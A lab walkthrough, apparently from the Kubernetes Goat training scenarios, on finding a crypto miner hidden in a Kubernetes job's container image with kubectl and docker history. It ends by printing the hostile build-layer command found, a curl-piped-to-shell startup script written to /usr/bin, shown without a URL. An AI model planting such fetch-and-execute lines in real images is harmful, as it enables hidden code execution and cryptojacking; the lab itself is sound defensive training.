Analysing crypto miner container

Scenario Information

Crypto mining has become popular with modern infrastructure. Especially environments like Kubernetes are an easy target as you might not even look at what exactly the container image builds upon and what it is doing with proactive monitoring. Here in this scenario, we will analyse and identify the crypto miner.

  • To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.
kubectl get jobs

Scenario 10 get jobs

Scenario Solution

Identify all resources within a Kubernetes cluster. If possible get into details of each container image available in all the nodes within the cluster as well

  • Once we have identified the job we ran in the Kubernetes cluster, got the pod information by running following command
kubectl describe job batch-check-job

Scenario 10 get job info

  • Then get the pod information by running the below command
kubectl get pods --namespace default -l "job-name=batch-check-job"
  • Then get the pod information manifest and analyse
kubectl get pod batch-check-job-xxxx -o yaml

Scenario 10 get pod info

  • Identified that it's running madhuakula/k8s-goat-batch-check docker image

  • After performing analysis of this image we identified it has the mining stuff in the build time script in one of the layer

docker history --no-trunc madhuakula/k8s-goat-batch-check

Scenario 10 get docker history

echo "curl -sSL && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup